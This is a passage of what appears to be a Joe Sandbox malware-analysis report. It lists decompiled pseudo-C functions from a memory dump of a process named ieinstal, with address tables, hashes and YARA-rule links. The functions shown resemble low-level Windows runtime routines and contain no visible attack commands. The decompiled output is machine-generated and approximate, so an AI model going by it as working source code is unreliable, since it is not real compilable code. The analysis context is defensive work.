					} else {
						asm("lock xadd [esi], eax");
						if((_t18 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t35 + 4)));
							E1F002A80();
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t35);
						}
					}
					return _t27;
				}
			}

0x1efb7b88
0x1efb7b8a
0x1efb7b8c
0x1efb7b93
0x1efb7b97
0x1f01af6d
0x1f01af73
0x1f01af76
0x1efb7b9d
0x1efb7ba0
0x1efb7ba3
0x1efb7ba3
0x1efb7ba6
0x1efb7baa
0x1efb7bad
0x1efb7bb4
0x1f01af8f
0x00000000
0x00000000
0x00000000
0x1efb7bba
0x1efb7bbd
0x1efb7bc2
0x1f01af86
0x1f01af95
0x1f01af9c
0x1f01afa3
0x1f01afa9
0x1f01afa9
0x1f01afa3
0x1efb7bc8
0x1efb7bca
0x1f01afb0
0x1f01afb5
0x1efb7bd0
0x1efb7bd3
0x1efb7bd7
0x1f01afbf
0x1f01afc2
0x1f01afd4
0x1f01afd4
0x1efb7bd7
0x1efb7be3
0x1efb7be3

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3810b56c94ce12ae9611392e3a0d553e26db2851d7b58b37783288765c4ff356
Instruction ID: 9e9429b7ce33244ac0f71e294a9c6ec2c2b58c8bb051524d8cf7183b7d6581ff
Opcode Fuzzy Hash: 3810b56c94ce12ae9611392e3a0d553e26db2851d7b58b37783288765c4ff356
Instruction Fuzzy Hash: 7F112975605201ABCB20DF76C460EEABBF5EF14710F18472AEC459B684E735E881CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFAA0E Relevance: .1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1EFFAA0E(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E1EFE332D( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x1effaa0e
0x1effaa13
0x1effaa14
0x1effaa1e
0x1effaa20
0x1effaa23
0x1effaa2b
0x1effaa80
0x1effaa59
0x1effaa5c
0x1effaa5f
0x1f036930
0x1effaa71
0x1effaa77
0x1effaa77
0x1f036938
0x1effaa9e
0x1effaa9e
0x00000000
0x1effaa9e
0x1f036941
0x1f036950
0x1f036955
0x1f036955
0x1f036958
0x00000000
0x1f036958
0x1effaa67
0x00000000
0x00000000
0x1effaa69
0x1effaa6d
0x1effaa8b
0x1effaa90
0x1effaa90
0x1effaa6f
0x00000000
0x1effaa6f
0x1effaa3f
0x1effaa43
0x1effaa97
0x00000000
0x1effaa97
0x1effaa4b
0x1effaa4e
0x1effaa50
0x1effaa53
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc3492ee58ae507e05650e1380ccd0cbe77e5c14439bc1406ce94b79f981a113
Instruction ID: 8e74fb2f472128d091712125cfe404d9a0c77d1dacc506d0af4981dd8f9de369
Opcode Fuzzy Hash: bc3492ee58ae507e05650e1380ccd0cbe77e5c14439bc1406ce94b79f981a113
Instruction Fuzzy Hash: 94218E77640A45DFC722CF4AC660A56B7E5EF84B10F11867EEC458B624C731EC08CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1F04CD00 Relevance: .1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E1F04CD00(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v16;
				void* _t12;
				intOrPtr _t14;
				void* _t24;
				void* _t28;
				signed int _t36;
				intOrPtr* _t37;
				intOrPtr* _t44;

				_push(__ecx);
				if(( *0x1f0b391c & 0x00000004) != 0) {
					L1EFD2330(_t12, 0x1f0b67d4);
					_t44 = _a4;
					_t14 =  *_t44;
					if( *((intOrPtr*)(_t14 + 4)) != _t44) {
						L8:
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t36 = _v16;
						if(_t36 == 0 || (_t36 & ( !(E1EFE014D()) | 0x00000100)) != 0) {
							return 0xc000000d;
						} else {
							 *0x1f0b68f0 = _t36;
							return 0;
						}
					}
					_t37 =  *((intOrPtr*)(_t44 + 4));
					if( *_t37 != _t44) {
						goto L8;
					}
					 *_t37 = _t14;
					 *((intOrPtr*)(_t14 + 4)) = _t37;
					 *0x1f0b33e0 =  *0x1f0b33e0 + 0xfffe -  *((intOrPtr*)(_t44 + 8));
					L1EFD2330(E1EFD24D0(0x1f0b67d4), 0x1f0b67c4);
					_t24 = E1EFFD532(0x1f0b4fe0);
					_t41 = _t24;
					E1EFD24D0(0x1f0b67c4);
					if(_t24 != 0) {
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t41);
					}
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t44);
					_t28 = 0;
				} else {
					_t28 = 0xc000000d;
				}
				return _t28;
			}

0x1f04cd08
0x1f04cd13
0x1f04cd29
0x1f04cd2e
0x1f04cd31
0x1f04cd36
0x1f04cda4
0x1f04cda4
0x1f04cda7
0x1f04cda9
0x1f04cdaa
0x1f04cdab
0x1f04cdac
0x1f04cdad
0x1f04cdae
0x1f04cdaf
0x1f04cdb5
0x1f04cdba
0x00000000
0x1f04cdcc
0x1f04cdcc
0x00000000
0x1f04cdd2
0x1f04cdba
0x1f04cd38
0x1f04cd3d
0x00000000
0x00000000
0x1f04cd3f
0x1f04cd41
0x1f04cd4d
0x1f04cd60
0x1f04cd6a
0x1f04cd70
0x1f04cd72
0x1f04cd79
0x1f04cd87
0x1f04cd87
0x1f04cd98
0x1f04cd9d
0x1f04cd15
0x1f04cd15
0x1f04cd15
0x1f04cd20

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1747f8ad2f0bc026841dff34f755c749de0571e916b3cf5ba7223b3807e9a8a
Instruction ID: e84748f76199074eb1c46b9400ef9a2994a912deed8796a2b304d63a29627f4b
Opcode Fuzzy Hash: f1747f8ad2f0bc026841dff34f755c749de0571e916b3cf5ba7223b3807e9a8a
Instruction Fuzzy Hash: CC11067A250681ABC322DB24C850F1A3BB8EF81B74F244979FD555B591CB31A901C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 1F04DA40 Relevance: .1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1F04DA40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t32;
				intOrPtr* _t36;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr* _t40;
				void* _t45;
				void* _t47;
				void* _t50;
				void* _t54;

				_t50 = __eflags;
				_push(8);
				_push(0x1f09cea0);
				E1F017BE4(__ebx, __edi, __esi);
				_t45 = __ecx;
				E1F04D9C7(__ebx, __edi, __ecx, _t50);
				E1EFCFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t20 = _t45 + 8;
				_t39 =  *_t20;
				_t31 =  *((intOrPtr*)(_t20 + 4));
				if( *((intOrPtr*)(_t39 + 4)) != _t20 ||  *_t31 != _t20) {
					L13:
					_t32 = 3;
					asm("int 0x29");
					_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					return E1EFCE740(_t32);
				} else {
					 *_t31 = _t39;
					 *((intOrPtr*)(_t39 + 4)) = _t31;
					_t23 =  *0x1f0b6a00; // 0x0
					while(_t23 != 0) {
						_t54 = _t23 -  *0x1f0b3940; // 0xffffffff
						if(_t54 < 0) {
							break;
						} else {
							_t37 =  *0x1f0b6a04; // 0x0
							_t25 =  *_t37;
							if( *((intOrPtr*)(_t37 + 4)) != 0x1f0b6a04 ||  *((intOrPtr*)(_t25 + 4)) != _t37) {
								goto L13;
							} else {
								 *0x1f0b6a04 = _t25;
								 *((intOrPtr*)(_t25 + 4)) = 0x1f0b6a04;
								E1EFB92AF(_t37 + 0xfffffff8);
								_t27 =  *0x1f0b6a00; // 0x0
								_t23 = _t27 - 1;
								 *0x1f0b6a00 = _t23;
								continue;
							}
						}
						goto L15;
					}
					__eflags =  *0x1f0b3940;
					if( *0x1f0b3940 <= 0) {
						_t24 = E1EFB92AF(_t45);
						goto L12;
					} else {
						_t36 = _t45 + 8;
						_t40 =  *0x1f0b6a08; // 0x0
						__eflags =  *_t40 - 0x1f0b6a04;
						if( *_t40 != 0x1f0b6a04) {
							goto L13;
						} else {
							 *_t36 = 0x1f0b6a04;
							 *((intOrPtr*)(_t36 + 4)) = _t40;
							 *_t40 = _t36;
							 *0x1f0b6a08 = _t36;
							_t24 = _t23 + 1;
							 *0x1f0b6a00 = _t24;
							L12:
							 *(_t47 - 4) = 0xfffffffe;
							L14();
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
					}
				}
				L15:
			}

0x1f04da40
0x1f04da40
0x1f04da42
0x1f04da47
0x1f04da4c
0x1f04da4e
0x1f04da5c
0x1f04da61
0x1f04da65
0x1f04da68
0x1f04da6a
0x1f04da70
0x1f04db16
0x1f04db18
0x1f04db19
0x1f04db21
0x1f04db29
0x1f04da7e
0x1f04da7e
0x1f04da80
0x1f04da88
0x1f04da8d
0x1f04da91
0x1f04da97
0x00000000
0x1f04da99
0x1f04da99
0x1f04da9f
0x1f04daa4
0x00000000
0x1f04daab
0x1f04daab
0x1f04dab0
0x1f04dab6
0x1f04dabb
0x1f04dac0
0x1f04dac1
0x00000000
0x1f04dac1
0x1f04daa4
0x00000000
0x1f04da97
0x1f04dac8
0x1f04dacf
0x1f04daf5
0x00000000
0x1f04dad1
0x1f04dad1
0x1f04dad4
0x1f04dada
0x1f04dadc
0x00000000
0x1f04dade
0x1f04dade
0x1f04dae0
0x1f04dae3
0x1f04dae5
0x1f04daeb
0x1f04daec
0x1f04dafa
0x1f04dafa
0x1f04db01
0x1f04db09
0x1f04db15
0x1f04db15
0x1f04dadc
0x1f04dacf
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdccaf6b53b0dc3b33422994bab66f831c255bce51d5c797fa40064e61433aaa
Instruction ID: 5e2d9ef05584dcc7628d890b93a05d3effa1c24ee4de62f8cbac142664bfedd8
Opcode Fuzzy Hash: fdccaf6b53b0dc3b33422994bab66f831c255bce51d5c797fa40064e61433aaa
Instruction Fuzzy Hash: 9E2138B9606792CFCB15CF24C5A0688F7E1FB45364B24C6BED4068BB90E732A851DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFBBC0 Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1EFFBBC0(void* __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int* _a20) {
				void* _t14;
				signed char* _t17;
				signed char* _t19;
				void* _t30;
				signed char* _t41;
				signed char* _t45;

				_push(__ecx);
				_t14 = E1EFD3C40();
				_t41 = 0x7ffe0385;
				if(_t14 != 0) {
					_t17 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				} else {
					_t17 = 0x7ffe0385;
				}
				_t45 = 0x7ffe0384;
				if(( *_t17 & 0x00000001) != 0) {
					if(E1EFD3C40() == 0) {
						_t19 = 0x7ffe0384;
					} else {
						_t19 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					E1F04FC01(0x1ef91be8,  *_t19 & 0x000000ff);
				}
				_t30 = E1EFCC6E0(_a8, _a12, _a16, _a4, _a20);
				if(E1EFD3C40() != 0) {
					_t41 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t41 & 0x00000001) != 0) {
					if(E1EFD3C40() != 0) {
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					E1F04FC01(0x1ef91be0,  *_t45 & 0x000000ff);
					goto L5;
				} else {
					L5:
					return _t30;
				}
			}

0x1effbbc8
0x1effbbcc
0x1effbbd1
0x1effbbd8
0x1f0377f9
0x1effbbde
0x1effbbde
0x1effbbde
0x1effbbe3
0x1effbbe8
0x1f03780a
0x1f03781c
0x1f03780c
0x1f037815
0x1f037815
0x1f037826
0x1f037826
0x1effbc02
0x1effbc0b
0x1f03783a
0x1f03783a
0x1effbc14
0x1f03784c
0x1f037857
0x1f037857
0x1f037865
0x00000000
0x1effbc1a
0x1effbc1a
0x1effbc22
0x1effbc22

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1335eb416e64f5bf4af703fd2b65fd4aab6fd83970d19991dcdb8108c10dc06d
Instruction ID: 05f13181f3ff635249336a9c26124d4fb9e813498ae4ba5d9e8bf0423f1220e7
Opcode Fuzzy Hash: 1335eb416e64f5bf4af703fd2b65fd4aab6fd83970d19991dcdb8108c10dc06d
Instruction Fuzzy Hash: 16110336A496D5CFD302CB69C820B1A7BD9EF44B55F1902B5ED108B391EB36FC01D2A1

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFBF0C Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1EFFBF0C(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				signed int _t18;
				char* _t22;
				char* _t28;
				signed char _t34;
				signed char _t35;
				void* _t47;
				intOrPtr* _t48;

				_t47 = __edx;
				_t48 = __ecx;
				if(( *0x1f0b6638 & 0x00000004) == 0) {
					_t18 =  *(__ecx + 0x5c) & 0x0000ffff;
					if(_t18 > 0x70 ||  *((intOrPtr*)(__ecx + 0x50)) < ( *(0x1ef9b518 + _t18 * 2) & 0x0000ffff) << 4) {
						goto L1;
					} else {
						asm("sbb bl, bl");
						_t35 = _t34 & 0x00000001;
						L2:
						if(E1EFD3C40() != 0) {
							_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t22 = 0x7ffe038a;
						}
						if( *_t22 != 0) {
							L16:
							if(_t35 != 0) {
								E1F07F38A(_t35,  *((intOrPtr*)( *((intOrPtr*)( *_t48 + 0xc)) + 0xc)),  *((intOrPtr*)(_t47 + 4)),  *(_t48 + 0x5c) & 0x0000ffff);
							}
							goto L8;
						} else {
							if(E1EFD3C40() != 0) {
								_t28 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t28 = 0x7ffe0380;
							}
							if( *_t28 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
									goto L8;
								}
								goto L16;
							} else {
								L8:
								return _t35;
							}
						}
					}
				}
				L1:
				_t35 = 0;
				goto L2;
			}

0x1effbf16
0x1effbf18
0x1effbf1a
0x1effbf5a
0x1effbf61
0x00000000
0x1effbf75
0x1f019688
0x1f01968a
0x1effbf1e
0x1effbf25
0x1f01969a
0x1effbf2b
0x1effbf2b
0x1effbf2b
0x1effbf33
0x1f0196ca
0x1f0196cc
0x1f0196e2
0x1f0196e2
0x00000000
0x1effbf39
0x1effbf40
0x1f0196ad
0x1effbf46
0x1effbf46
0x1effbf46
0x1effbf4e
0x1f0196c4
0x00000000
0x00000000
0x00000000
0x1effbf56
0x1effbf56
0x1effbf59
0x1effbf59
0x1effbf4e
0x1effbf33
0x1effbf61
0x1effbf1c
0x1effbf1c
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50599642fef18d5a0475bc089c61e41192a60bb6a5699a6868d85cf15b61f04f
Instruction ID: 31536a413a5be9b2a1337bce7678c062cdcf44b1483bd79728da4744bd22e5f2
Opcode Fuzzy Hash: 50599642fef18d5a0475bc089c61e41192a60bb6a5699a6868d85cf15b61f04f
Instruction Fuzzy Hash: D311037A205695CBD314CB69C0B0761B3E4EB01B08F18069AFC878F7A1D36AEC85CA30

Uniqueness

Uniqueness Score: -1.00%

Function 1EFDDCD1 Relevance: .1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1EFDDCD1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t24;
				signed char* _t30;
				char _t35;
				void* _t45;
				intOrPtr _t48;
				void* _t50;

				_push(0x14);
				_push(0x1f09c2e0);
				E1F017BE4(__ebx, __edi, __esi);
				_t48 = __edx;
				 *((intOrPtr*)(_t50 - 0x20)) = __edx;
				_t45 = __ecx;
				if(E1EFD3C40() != 0) {
					_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t24 = 0x7ffe0384;
				}
				if( *_t24 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
						goto L3;
					}
					if(E1EFD3C40() == 0) {
						_t30 = 0x7ffe0385;
					} else {
						_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t30 & 0x00000020) == 0) {
						goto L3;
					}
					_t35 = 0;
					E1F040227(0x14a3, _t48, 0,  *((intOrPtr*)(_t50 + 8)), 0, 0);
					goto L4;
				} else {
					L3:
					_t35 = 0;
					L4:
					 *((char*)(_t50 - 0x19)) = _t35;
					 *((intOrPtr*)(_t50 - 4)) = _t35;
					 *((intOrPtr*)(_t50 - 0x24)) = 1;
					L1F004CDB();
					 *((char*)(_t50 - 0x19)) = E1F002960(_t45, _t48,  *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)));
					 *((intOrPtr*)(_t50 - 4)) = 0xfffffffe;
					 *((intOrPtr*)(_t50 - 0x24)) = 0;
					E1EFDDD4D(_t35, _t48);
					 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0x10));
					return  *((intOrPtr*)(_t50 - 0x19));
				}
			}

0x1efddcd1
0x1efddcd3
0x1efddcd8
0x1efddcdd
0x1efddcdf
0x1efddce2
0x1efddceb
0x1f0294ae
0x1efddcf1
0x1efddcf1
0x1efddcf1
0x1efddcf9
0x1f0294c5
0x00000000
0x00000000
0x1f0294d2
0x1f0294e4
0x1f0294d4
0x1f0294dd
0x1f0294dd
0x1f0294ec
0x00000000
0x00000000
0x1f0294f2
0x1f029501
0x00000000
0x1efddcff
0x1efddcff
0x1efddcff
0x1efddd01
0x1efddd01
0x1efddd04
0x1efddd07
0x1efddd10
0x1efddd22
0x1efddd25
0x1efddd2c
0x1efddd33
0x1efddd3e
0x1efddd4a
0x1efddd4a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caace84a8ff10645c50f7a965d2e1925f5712093e3328fec5e681fb395ec0b4a
Instruction ID: bb587c5cdc765b4053702d4832107c6d513d042e4e7e7757034cfb3f61e066d1
Opcode Fuzzy Hash: caace84a8ff10645c50f7a965d2e1925f5712093e3328fec5e681fb395ec0b4a
Instruction Fuzzy Hash: B521DF76A05384DFDB12CFA8C550BDDBFE5FB04748F0802AAED05AB291D77AA904D724

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC2E32 Relevance: .1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1EFC2E32(intOrPtr _a4) {
				void* __ecx;
				signed int _t10;
				intOrPtr _t17;
				void* _t18;
				signed int _t27;
				signed int _t28;
				void* _t29;

				_t17 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if(E1F0161D5() != 0) {
					_push(5);
				} else {
					_push(4);
				}
				_pop(_t28);
				_t27 = _t28;
				if( *0x1f0b6614 == 0) {
					L7:
					_t10 =  *0x1f0b67d8; // 0x1
					if(_t10 == 0) {
						_t10 = E1EFFA965(0x1ef91740, 1, 0x1f0b67d8);
					}
					_t29 = E1EFC2EE8(0x1ef96e30 + _t10 * 0x14, _t28, _a4, 0);
				} else {
					L1EFC53C0(0x1f0b67d4);
					if( *0x1f0b6614 == 0) {
						E1EFC52F0(_t18, 0x1f0b67d4);
						goto L7;
					} else {
						_t29 = E1EFC2EE8(0x1ef96e6c, _t27, _a4, 0);
						E1EFC52F0(0x1ef96e6c, 0x1f0b67d4);
					}
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t17;
					 *((char*)(_t29 + 0x48)) = 0;
				}
				return _t29;
			}

0x1efc2e44
0x1efc2e51
0x1efc2e57
0x1efc2e53
0x1efc2e53
0x1efc2e53
0x1efc2e60
0x1efc2e61
0x1efc2e63
0x1efc2ea1
0x1efc2ea1
0x1efc2ea8
0x1efc2eb7
0x1efc2eb7
0x1efc2ed1
0x1efc2e65
0x1efc2e6a
0x1efc2e76
0x1efc2e9c
0x00000000
0x1efc2e78
0x1efc2e8e
0x1efc2e90
0x1efc2e90
0x1efc2e76
0x1efc2ed5
0x1efc2ed7
0x1efc2eda
0x1efc2eda
0x1efc2ee5

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d938839a7c741811369ae72b521848c2a4cbda62479db649df68ef488f0f4f8
Instruction ID: fa75dd5d15c3bfd7a71d4e4377c758b325dec55564235ce255250188a3b16f98
Opcode Fuzzy Hash: 2d938839a7c741811369ae72b521848c2a4cbda62479db649df68ef488f0f4f8
Instruction Fuzzy Hash: F0110ABE6007625BF320D75ADC74F9AB6C6DF40E64F7006EAED49B7650C671E8008264

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBFA44 Relevance: .1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1EFBFA44(void* __ecx) {
				signed int _v8;
				char _v12;
				void* _t18;
				intOrPtr* _t19;
				void* _t26;
				intOrPtr _t28;
				void* _t29;
				char* _t32;
				intOrPtr* _t34;
				intOrPtr _t40;
				intOrPtr _t41;
				void* _t43;
				void* _t45;

				_push(__ecx);
				_push(__ecx);
				_t43 = __ecx;
				if(( *(__ecx + 0xc) & 0x00000001) != 0) {
					_t18 = 0;
				} else {
					_t19 = __ecx + 0x10;
					_t28 =  *_t19;
					_t34 =  *((intOrPtr*)(_t19 + 4));
					_t40 =  *((intOrPtr*)(_t28 + 4));
					if( *_t34 != _t40 ||  *_t34 != _t19) {
						_push(0);
						_push( *_t34);
						_push(_t40);
						_push(_t19);
						_t29 = 0xd;
						E1F085FED(_t29, 0);
					} else {
						 *_t34 = _t28;
						 *((intOrPtr*)(_t28 + 4)) = _t34;
					}
					_t41 =  *((intOrPtr*)(_t43 + 0x18));
					_v8 = _v8 & 0x00000000;
					_v12 =  *((intOrPtr*)(_t43 + 0x1c));
					_t45 = E1EFBFABA( &_v12,  &_v8, 0x8000);
					if(E1EFD3C40() != 0) {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					} else {
						_t32 = 0x7ffe0388;
					}
					if( *_t32 != 0) {
						E1F07DA30(_t26, _t41, _v12, _v8);
					}
					_t18 = _t45;
				}
				return _t18;
			}

0x1efbfa49
0x1efbfa4a
0x1efbfa4c
0x1efbfa53
0x1efbfab6
0x1efbfa55
0x1efbfa55
0x1efbfa58
0x1efbfa5a
0x1efbfa5d
0x1efbfa62
0x1f01e69c
0x1f01e69e
0x1f01e6a2
0x1f01e6a3
0x1f01e6a6
0x1f01e6a7
0x1efbfa70
0x1efbfa70
0x1efbfa72
0x1efbfa72
0x1efbfa7b
0x1efbfa7e
0x1efbfa82
0x1efbfa93
0x1efbfa9c
0x1f01e6bb
0x1efbfaa2
0x1efbfaa2
0x1efbfaa2
0x1efbfaaa
0x1f01e6ce
0x1f01e6ce
0x1efbfab0
0x1efbfab0
0x1efbfab5

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0618b16642c9786a4f8261004c1be5540226bb784326370feee92edf29b3d6f3
Instruction ID: 0ebd9d781dc6f4be496de6bccca413392f182aaa73e841e691cfa26ee74bb4b4
Opcode Fuzzy Hash: 0618b16642c9786a4f8261004c1be5540226bb784326370feee92edf29b3d6f3
Instruction Fuzzy Hash: C6119076600341EFD719CF51C810F5ABBEAEB85354F1886A9D8019F241E772FD828B90

Uniqueness

Uniqueness Score: -1.00%

Function 1F04CED0 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1F04CED0(signed int __ecx, signed int _a4) {
				signed int _t16;
				signed int _t18;
				signed char _t19;
				void* _t20;
				signed int _t26;
				signed int _t29;
				signed char _t30;
				signed int _t36;
